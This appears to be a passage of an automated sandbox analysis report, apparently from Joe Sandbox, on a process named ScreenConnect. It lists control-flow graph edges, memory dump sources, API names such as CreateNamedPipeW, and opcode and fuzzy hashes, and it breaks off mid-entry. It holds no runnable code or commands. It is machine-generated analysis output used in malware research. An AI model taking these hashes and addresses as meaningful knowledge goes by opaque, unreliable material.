7ffd9b71729f-7ffd9b7172c3 107->108 120 7ffd9b71730f-7ffd9b71731d 108->120 121 7ffd9b7172c5-7ffd9b7172e2 108->121 125 7ffd9b716ef6-7ffd9b716ef8 109->125 126 7ffd9b716efa-7ffd9b716f1e call 7ffd9b716a10 * 2 109->126 115->108 120->101 135 7ffd9b71738e-7ffd9b717407 121->135 136 7ffd9b7172e8-7ffd9b71730d 121->136 129 7ffd9b71711a-7ffd9b71712a 123->129 130 7ffd9b71712c 123->130 152 7ffd9b71715a-7ffd9b717165 124->152 153 7ffd9b71720b-7ffd9b717216 124->153 131 7ffd9b716f21-7ffd9b716f36 125->131 126->131 138 7ffd9b71712e-7ffd9b71712f 129->138 130->138 145 7ffd9b716f38-7ffd9b716f3a 131->145 146 7ffd9b716f3c-7ffd9b716f60 call 7ffd9b716a10 131->146 157 7ffd9b717450-7ffd9b7174a6 135->157 158 7ffd9b717409-7ffd9b71744d 135->158 136->120 138->124 150 7ffd9b716f63-7ffd9b716f71 145->150 146->150 165 7ffd9b716f73-7ffd9b716f75 150->165 166 7ffd9b716f77-7ffd9b716f85 call 7ffd9b7100a8 150->166 163 7ffd9b717167-7ffd9b717169 152->163 164 7ffd9b71716b-7ffd9b71717a call 7ffd9b7100a8 152->164 167 7ffd9b717218-7ffd9b71721a 153->167 168 7ffd9b71721c-7ffd9b71722b call 7ffd9b7100a8 153->168 197 7ffd9b7174a8-7ffd9b7174a9 157->197 198 7ffd9b7174ac-7ffd9b7174d0 157->198 212 7ffd9b71744e 158->212 172 7ffd9b71717d-7ffd9b7171b1 163->172 164->172 174 7ffd9b716f88-7ffd9b716f91 165->174 166->174 176 7ffd9b71722e-7ffd9b717230 167->176 168->176 172->153 187 7ffd9b7171b3-7ffd9b7171c1 172->187 196 7ffd9b716f98-7ffd9b716f9f 174->196 176->101 178 7ffd9b717236-7ffd9b717257 176->178 188 7ffd9b7171c3-7ffd9b7171cb 187->188 189 7ffd9b7171d4-7ffd9b7171dc 187->189 193 7ffd9b7171dd-7ffd9b7171de 188->193 194 7ffd9b7171cd-7ffd9b7171d2 188->194 189->193 195 7ffd9b7171ee-7ffd9b717208 189->195 200 7ffd9b7171e3-7ffd9b7171ed call 7ffd9b716a48 193->200 194->200 195->153 196->99 201 7ffd9b716fa5-7ffd9b716fac 196->201 197->198 213 7ffd9b717502-7ffd9b71750b 198->213 214 7ffd9b7174d2-7ffd9b7174e1 198->214 200->195 201->99 205 7ffd9b716fb2-7ffd9b716fc9 201->205 218 7ffd9b716ffe-7ffd9b717009 205->218 219 7ffd9b716fcb-7ffd9b716fdd 205->219 212->212 216 7ffd9b7174e3-7ffd9b7174e4 214->216 217 7ffd9b7174e7-7ffd9b717501 214->217 216->217 223 7ffd9b71700f-7ffd9b71701e call 7ffd9b7100a8 218->223 224 7ffd9b71700b-7ffd9b71700d 218->224 225 7ffd9b716fdf-7ffd9b716fe1 219->225 226 7ffd9b716fe3-7ffd9b716ff1 call 7ffd9b7100a8 219->226 227 7ffd9b717021-7ffd9b717023 223->227 224->227 230 7ffd9b716ff4-7ffd9b716ff7 225->230 226->230 233 7ffd9b7170d8-7ffd9b7170ed 227->233 234 7ffd9b717029-7ffd9b717040 227->234 230->218 233->99 234->233 238 7ffd9b717046-7ffd9b717063 234->238 241 7ffd9b71706f 238->241 242 7ffd9b717065-7ffd9b71706d 238->242 243 7ffd9b717071-7ffd9b717073 241->243 242->243 243->233 245 7ffd9b717075-7ffd9b71707f 243->245 246 7ffd9b71708d-7ffd9b717095 245->246 247 7ffd9b717081-7ffd9b71708b call 7ffd9b713cc0 245->247 249 7ffd9b7170c3-7ffd9b7170d6 call 7ffd9b716a38 246->249 250 7ffd9b717097-7ffd9b7170bc call 7ffd9b7156a8 246->250 247->99 247->246 249->99 250->249
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: H
                                                                • API String ID: 0-2852464175
                                                                • Opcode ID: 67f6ad16443050e2667190e62294dfc2a776f21f1e15a8b5e4a5bfd070b95f37
                                                                • Instruction ID: 3fd0926676ef002c59e572c4d393ab704a67724b1466225b59be20ffdea54c56
                                                                • Opcode Fuzzy Hash: 67f6ad16443050e2667190e62294dfc2a776f21f1e15a8b5e4a5bfd070b95f37
                                                                • Instruction Fuzzy Hash: 8C423771B0EB4A4FE7A59BA884747B837E2EF94340F16467AD04DC71F2DD29BA058360

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 276 7ffd9b403642-7ffd9b4258da 279 7ffd9b4258e4-7ffd9b4259a1 CreateNamedPipeW 276->279 280 7ffd9b4258dc-7ffd9b4258e1 276->280 282 7ffd9b4259a3 279->282 283 7ffd9b4259a9-7ffd9b4259dc 279->283 280->279 282->283
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2912669562.00007FFD9B400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B400000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b400000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: CreateNamedPipe
                                                                • String ID:
                                                                • API String ID: 2489174969-0
                                                                • Opcode ID: e6537c8f466aa65bd4890be5ae007b38dda0bf1f7f542ba53b842a955ab0907f
                                                                • Instruction ID: e528a5f226f4a839f6e306b76b4947bdaac5d54488742d54a8c94eb64e09b5a2
                                                                • Opcode Fuzzy Hash: e6537c8f466aa65bd4890be5ae007b38dda0bf1f7f542ba53b842a955ab0907f
                                                                • Instruction Fuzzy Hash: 2851907191CA1C8FDB68EF5C9846BE9B7E0FB59714F1442AEE04ED3251CB70A9818BC1

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 728 7ffd9b7100f2-7ffd9b71010a 730 7ffd9b7100a7-7ffd9b7100b5 728->730 731 7ffd9b71010c-7ffd9b710118 728->731 733 7ffd9b7100b7-7ffd9b7100e8 730->733 735 7ffd9b710152 731->735 736 7ffd9b71011a 731->736 737 7ffd9b7100ef-7ffd9b7100f1 733->737 735->737 738 7ffd9b710154-7ffd9b71016d 735->738 736->733 739 7ffd9b71011c-7ffd9b71011d 736->739 749 7ffd9b71016f-7ffd9b710182 738->749 742 7ffd9b71011f-7ffd9b710141 739->742 750 7ffd9b710143-7ffd9b710150 742->750 751 7ffd9b710186 742->751 749->742 755 7ffd9b710184-7ffd9b710185 749->755 750->735 752 7ffd9b710187-7ffd9b7101b8 751->752 761 7ffd9b7101bf-7ffd9b7101d2 752->761 755->751 755->752 761->749 763 7ffd9b7101d4-7ffd9b7101d9 761->763 765 7ffd9b71021d-7ffd9b710220 763->765 766 7ffd9b7101db-7ffd9b7101ea 763->766 767 7ffd9b710222 765->767 768 7ffd9b710263-7ffd9b710284 765->768 766->752 773 7ffd9b7101ec-7ffd9b7101f1 766->773 767->761 769 7ffd9b710224-7ffd9b710241 767->769 779 7ffd9b710285-7ffd9b710294 768->779 769->779 780 7ffd9b710242-7ffd9b71024f 769->780 786 7ffd9b710297-7ffd9b7102ad 779->786 785 7ffd9b710251-7ffd9b710258 780->785 787 7ffd9b714a10-7ffd9b714a86 785->787 793 7ffd9b7102af-7ffd9b7102b4 786->793 791 7ffd9b714ab1-7ffd9b714ae4 787->791 792 7ffd9b714a88-7ffd9b714aa9 787->792 794 7ffd9b714c24-7ffd9b714c53 791->794 795 7ffd9b714aea-7ffd9b714b06 791->795 792->791 793->785 796 7ffd9b7102b6-7ffd9b7102fa 793->796 798 7ffd9b714ca4-7ffd9b714cb8 794->798 799 7ffd9b714c55-7ffd9b714c5f call 7ffd9b713cc0 794->799 795->794 807 7ffd9b714b0c-7ffd9b714bc6 795->807 796->786 824 7ffd9b7102fc-7ffd9b710312 796->824 801 7ffd9b714ce8-7ffd9b714cf3 798->801 802 7ffd9b714cba-7ffd9b714cc4 798->802 799->798 808 7ffd9b714c61-7ffd9b714c73 799->808 802->801 806 7ffd9b714cc6-7ffd9b714cd7 802->806 806->801 814 7ffd9b714cd9-7ffd9b714ce1 806->814 807->794 833 7ffd9b714bc8-7ffd9b714bd8 807->833 808->798 810 7ffd9b714c75-7ffd9b714c9f call 7ffd9b713cd0 808->810 810->798 814->801 824->793 829 7ffd9b710314-7ffd9b7103a4 824->829 847 7ffd9b710423-7ffd9b71048e 829->847 848 7ffd9b7103a6-7ffd9b7103ae 829->848 833->794 835 7ffd9b714bda-7ffd9b714c1f call 7ffd9b713cb0 833->835 835->794 867 7ffd9b710490-7ffd9b7104c6 847->867 868 7ffd9b7104d8-7ffd9b710500 847->868 850 7ffd9b7103af-7ffd9b710412 848->850 864 7ffd9b710414-7ffd9b710420 850->864 864->847 873 7ffd9b710502-7ffd9b710521 868->873 874 7ffd9b710524-7ffd9b71053c 868->874 873->874 878 7ffd9b71053e-7ffd9b71055d 874->878 879 7ffd9b710560-7ffd9b71057e 874->879 878->879 883 7ffd9b710580-7ffd9b710590 879->883 884 7ffd9b71059a 879->884 889 7ffd9b710597-7ffd9b710598 883->889 886 7ffd9b71059f-7ffd9b7105a5 884->886 887 7ffd9b71063e-7ffd9b710641 886->887 888 7ffd9b7105ab-7ffd9b7105b4 886->888 892 7ffd9b710643-7ffd9b71064d 887->892 893 7ffd9b710698-7ffd9b7106b6 call 7ffd9b710088 * 2 887->893 890 7ffd9b7105cd-7ffd9b7105d8 888->890 891 7ffd9b7105b6-7ffd9b7105c3 888->891 889->884 896 7ffd9b710624-7ffd9b71063c 890->896 897 7ffd9b7105da-7ffd9b7105f7 890->897 891->890 900 7ffd9b7105c5-7ffd9b7105cb 891->900 901 7ffd9b710655-7ffd9b71066e 892->901 910 7ffd9b710800-7ffd9b71081e call 7ffd9b710088 * 2 893->910 911 7ffd9b7106ba-7ffd9b7106c6 893->911 896->887 904 7ffd9b7105fd-7ffd9b710622 897->904 905 7ffd9b7108e2-7ffd9b71093f 897->905 900->890 912 7ffd9b7106df-7ffd9b7106ea 901->912 913 7ffd9b710670-7ffd9b710672 901->913 904->896 942 7ffd9b710941-7ffd9b71094a 905->942 943 7ffd9b71094b-7ffd9b710952 905->943 944 7ffd9b7108bd-7ffd9b7108df 910->944 945 7ffd9b710824-7ffd9b71082e 910->945 917 7ffd9b7106c8-7ffd9b7106ca 911->917 918 7ffd9b7106cc-7ffd9b7106da call 7ffd9b7100a8 911->918 921 7ffd9b7106eb-7ffd9b7106ec 912->921 919 7ffd9b7106ee-7ffd9b7106fa 913->919 920 7ffd9b710674 913->920 925 7ffd9b7106dd-7ffd9b7106de 917->925 918->925 928 7ffd9b710700-7ffd9b710701 919->928 929 7ffd9b7106fc-7ffd9b7106fe 919->929 920->911 927 7ffd9b710676-7ffd9b71067a 920->927 921->919 925->912 927->921 935 7ffd9b71067c-7ffd9b710681 927->935 932 7ffd9b710702-7ffd9b71070e call 7ffd9b7100a8 928->932 930 7ffd9b710711-7ffd9b710715 929->930 937 7ffd9b710716-7ffd9b71072e 930->937 932->930 935->932 940 7ffd9b710683-7ffd9b71068e 935->940 955 7ffd9b710730-7ffd9b710732 937->955 956 7ffd9b710734-7ffd9b710742 call 7ffd9b7100a8 937->956 946 7ffd9b7106ff 940->946 947 7ffd9b710690-7ffd9b710695 940->947 949 7ffd9b71095e-7ffd9b710969 943->949 950 7ffd9b710954-7ffd9b71095d 943->950 944->905 951 7ffd9b710830-7ffd9b710832 945->951 952 7ffd9b710834-7ffd9b710842 call 7ffd9b7100a8 945->952 946->928 947->937 954 7ffd9b710697 947->954 949->787 957 7ffd9b710845-7ffd9b710862 951->957 952->957 954->893 960 7ffd9b710745-7ffd9b710762 955->960 956->960 965 7ffd9b710864-7ffd9b710866 957->965 966 7ffd9b710868-7ffd9b710876 call 7ffd9b7100a8 957->966 968 7ffd9b710764-7ffd9b710766 960->968 969 7ffd9b710768-7ffd9b710776 call 7ffd9b7100a8 960->969 970 7ffd9b710879-7ffd9b710896 965->970 966->970 972 7ffd9b710779-7ffd9b71078f 968->972 969->972 978 7ffd9b710898-7ffd9b71089a 970->978 979 7ffd9b71089c-7ffd9b7108aa call 7ffd9b7100a8 970->979 980 7ffd9b710791-7ffd9b7107a4 call 7ffd9b7100a8 972->980 981 7ffd9b7107a6-7ffd9b7107ad 972->981 982 7ffd9b7108ad-7ffd9b7108b6 978->982 979->982 980->981 988 7ffd9b7107cd-7ffd9b7107d0 980->988 987 7ffd9b7107b4-7ffd9b7107c7 981->987 982->944 987->988 989 7ffd9b7107d2-7ffd9b7107e5 call 7ffd9b7100a8 988->989 990 7ffd9b7107e7-7ffd9b7107fa 988->990 989->910 989->990 990->910
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0ead8f84a6e7dc6fc5365332daa50fcf0b2138f20a8cb97b214f553fada3f8b9
                                                                • Instruction ID: 3b2b22a0c3c164ee229130fc668dd3f5fc2dc5d4696fb3a41e48fa36a342193f
                                                                • Opcode Fuzzy Hash: 0ead8f84a6e7dc6fc5365332daa50fcf0b2138f20a8cb97b214f553fada3f8b9
                                                                • Instruction Fuzzy Hash: C8921631B0EB4A4FEBA9EB6C84B16A437E1FF55710B1502BAD089CB1F3DD19E9428750
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5b6adbe31c1734ea536967b77443a943b71e6367dd7eab7935b935d4f2de2350
                                                                • Instruction ID: 887f232794c6a34ede0d97c829927e352c409a3746738b4bef1b4bb0ff8a78fe
                                                                • Opcode Fuzzy Hash: 5b6adbe31c1734ea536967b77443a943b71e6367dd7eab7935b935d4f2de2350
                                                                • Instruction Fuzzy Hash: 58122772B0EB4E0BEB799B6894657B437D1EF95340F1602BAD88DC71F7DD28A9028350
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9939a5c75320af70d9b682713eb8f86698a01ec205ee924eea9c68ee200c6d8d
                                                                • Instruction ID: 6f2fdeb5856cb8498685369745d8105079908f7d9cd4273cf9952bc74f49184b
                                                                • Opcode Fuzzy Hash: 9939a5c75320af70d9b682713eb8f86698a01ec205ee924eea9c68ee200c6d8d
                                                                • Instruction Fuzzy Hash: C302B371B19B494FEBA8EB688465B7973E1FFA4300F01467EE44EC32B6DE24E9418741

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2912669562.00007FFD9B400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B400000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b400000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: MitigationPolicyProcess
                                                                • String ID:
                                                                • API String ID: 1088084561-0
                                                                • Opcode ID: 0b97f3df3222fe961f0238f701fc26f5e396a164d30392ee55c4399d1d63db13
                                                                • Instruction ID: da387da3858cb8b399e71f1bec61a7462a7c5ad03191ad0dd394e824d832f2b5
                                                                • Opcode Fuzzy Hash: 0b97f3df3222fe961f0238f701fc26f5e396a164d30392ee55c4399d1d63db13
                                                                • Instruction Fuzzy Hash: E6514B31D1DB494FDB28AFA8D84A5E97BE0EF55310F04417FE089C3192DE68A846CB92
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6ab5a92cd2c6cea6499d58efd1b8d9181fee59f4412230153fb89766b97b4435
                                                                • Instruction ID: b6f75448f0b9af3a96a345621a223fd39c1c3d37afe27a689fb838c299d6b43c
                                                                • Opcode Fuzzy Hash: 6ab5a92cd2c6cea6499d58efd1b8d9181fee59f4412230153fb89766b97b4435
                                                                • Instruction Fuzzy Hash: 5EC14A32A0EB4E0FEBA9EA6884619B573D1EF51350B05037ED44D871F6EE15FA0A8790
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4eb0c86dd6b504069a86db11e69c3d352fa3480f7f6688af95a79c11056ef9d6
                                                                • Instruction ID: 804d998d4da57e92600967d1b101f6cd1946d1a4eb1f24bf7a91711243377a5a
                                                                • Opcode Fuzzy Hash: 4eb0c86dd6b504069a86db11e69c3d352fa3480f7f6688af95a79c11056ef9d6
                                                                • Instruction Fuzzy Hash: C2A19A32B1EF8E0FEB69DB6884656B577E1EF55300B0502FAD448C71F3EE18A9068391
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e6552026151da91ed7932f0a29a72bb073f99e5b4cff70b5f00d403909f8e82d
                                                                • Instruction ID: ebffdd56e68e7b7ebb2ec43ad35232e23479f4ca3f75d0be91b5f2b8a27446ff
                                                                • Opcode Fuzzy Hash: e6552026151da91ed7932f0a29a72bb073f99e5b4cff70b5f00d403909f8e82d
                                                                • Instruction Fuzzy Hash: 9391513460DB494FDBDCEF58C4A0AA177A1FF9930472546E9C059CB2ABCA25E846C790
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 94fdb4d02bdffdd9ff560d38aee2c1ee11ea6bb145fd9555eae4c46dc290b988
                                                                • Instruction ID: 29ecd5d8fd6dd9e46716c3e985d675a868b3f8ff896f3d64e69b148f8cffd000
                                                                • Opcode Fuzzy Hash: 94fdb4d02bdffdd9ff560d38aee2c1ee11ea6bb145fd9555eae4c46dc290b988
                                                                • Instruction Fuzzy Hash: C5811471B0FB4F0EEB6A9BA844712747791EF55350F0A02BAD48DCB1F7DD18A9058361
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0f3dc95ca35622dfdfd9b9a9d90ed9b8c1d459fe0b221a252c874c2e5fb5bb29
                                                                • Instruction ID: 59412e270de95f9048acf1cdff092d61225b28f0114458f621c49a0970aa6121
                                                                • Opcode Fuzzy Hash: 0f3dc95ca35622dfdfd9b9a9d90ed9b8c1d459fe0b221a252c874c2e5fb5bb29
                                                                • Instruction Fuzzy Hash: 5971256290F79A1BE321ABBC98755F57FA0EF02624B0903F7D0C98F4B3DD1829458391
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 38b8d3679927fd8d4beb573efee4394efab408a4a94afc6a85150a7dae1f798f
                                                                • Instruction ID: 78ddaef71276330bceed201cbb7627936d3a706c8276c443bbd6003f748b950a
                                                                • Opcode Fuzzy Hash: 38b8d3679927fd8d4beb573efee4394efab408a4a94afc6a85150a7dae1f798f
                                                                • Instruction Fuzzy Hash: 0B51D37270DA494FEB98EF588461BA573D2FFA4314F0501B9D45DC72A6DE25F802CB50
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cfae716b13460d0ce7c5abc5dd8e9928c36b97ea3c93284580f2c10357a0b30d
                                                                • Instruction ID: d7a2f3414536516db6a2b0c105527bbac235786293f4c67160b877eb1e941291
                                                                • Opcode Fuzzy Hash: cfae716b13460d0ce7c5abc5dd8e9928c36b97ea3c93284580f2c10357a0b30d
                                                                • Instruction Fuzzy Hash: EC417932B0EF4D8BEBA4DAA898711ED77D2EFA4300B091279D48CC31B2DF216902C350
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 32fa65e5c9bf922ae6d3d542d539a088f3874bd6034f7dc7c87444d180b4ca8d
                                                                • Instruction ID: f47aad3207ce798c5fe5381a7e40d6145ab9a8b447ee9996a9f9a68d94036011
                                                                • Opcode Fuzzy Hash: 32fa65e5c9bf922ae6d3d542d539a088f3874bd6034f7dc7c87444d180b4ca8d
                                                                • Instruction Fuzzy Hash: 7631B222A0F7CA1FE76696A85C295703FE4DF5362070A12FBD48CCB0B3D95C69478362
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9a81b0a1badee60410d06c7951b6ef39cda8453c4cf99200ee6bec87adc974de
                                                                • Instruction ID: 8bda51fb0fca91799e9a2c1551520e2ee60f232b1a2cbfcad2b18392d24d44d8
                                                                • Opcode Fuzzy Hash: 9a81b0a1badee60410d06c7951b6ef39cda8453c4cf99200ee6bec87adc974de
                                                                • Instruction Fuzzy Hash: 85313932B0EA4C0FD7E4DA6CA89D2703BD1EF69251B0911BBE44CC7272E912AC838341
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fa0e045bf474d58a738ef7368a12737384de3ffd75116a711eef760b18ad202c
                                                                • Instruction ID: 789eb411dd72b39189137b695161c0b54c1186ca5400e2d66ec5b14b113577b2
                                                                • Opcode Fuzzy Hash: fa0e045bf474d58a738ef7368a12737384de3ffd75116a711eef760b18ad202c
                                                                • Instruction Fuzzy Hash: 2D11E733B2EE4D4AEBA496AC6C303FC3691EF44344F0501BAE45DE31F2DE159900C255
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 67dc5781de36023482a1d85c1937820f5762f2bd454a9fc4df7b5aec2b9fd2bd
                                                                • Instruction ID: e0c6e5dba8880422461c7708bcf62e5ba553590756f598f46f15a0e0ae6d607d
                                                                • Opcode Fuzzy Hash: 67dc5781de36023482a1d85c1937820f5762f2bd454a9fc4df7b5aec2b9fd2bd
                                                                • Instruction Fuzzy Hash: C511D6B6E0EB8C4BEFA5CFA458752A83FA1FF55300F06019AE058D31B2DE25A605C711
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 260f3d32a84ddf77100e3dbb6a8037414892b676bfa0cdb0e114336015634939
                                                                • Instruction ID: 93dcfcd2b6ae40b1def8e2688379a464156181bc13a14b2bc332061728090068
                                                                • Opcode Fuzzy Hash: 260f3d32a84ddf77100e3dbb6a8037414892b676bfa0cdb0e114336015634939
                                                                • Instruction Fuzzy Hash: 8011E315B0EB5B0BF779926848703753AE1DF46344F1A41BEC44AC61F6DC5CAD818B21
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0d11332927ffba3414b241692d5466f06929ae02b7d290593d47b1ae1c9e3d69
                                                                • Instruction ID: 1fd1b6d4450f02466ae776ced53ce9c5f178ebb836436f8a465f7a574d2266ee
                                                                • Opcode Fuzzy Hash: 0d11332927ffba3414b241692d5466f06929ae02b7d290593d47b1ae1c9e3d69
                                                                • Instruction Fuzzy Hash: 7011D031B19A494FDB98EF58C061B6577A2FF68304F0541A8C44DCB2A6DE35F9018750
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 29f4af5353159140abdd24943532e96e7e380cc19ca5217dea5598337cec5af8
                                                                • Instruction ID: 59a9f7901ac4ccc77b1a98bfde2e0b3c42b1a8e3eca259d6256b6d0558e599ed
                                                                • Opcode Fuzzy Hash: 29f4af5353159140abdd24943532e96e7e380cc19ca5217dea5598337cec5af8
                                                                • Instruction Fuzzy Hash: 9A116D71A19A494FDB98EF58C061BA577A2FF68304B0541A8D44DCB2A6DE35F9018B50
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d7196df8e148b8ea7587aca7428b324624bfdd3a1de7f88652157553ddcd5ce3
                                                                • Instruction ID: c681ab4551abb3e8dafa043e9dbce35e6963ee70b94847a28b33b48839c9a9b1
                                                                • Opcode Fuzzy Hash: d7196df8e148b8ea7587aca7428b324624bfdd3a1de7f88652157553ddcd5ce3
                                                                • Instruction Fuzzy Hash: D901F92170EB8E1FD395DA6C9CA82703FE4EF5A21130902F7E48CCB173E9156D468351
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
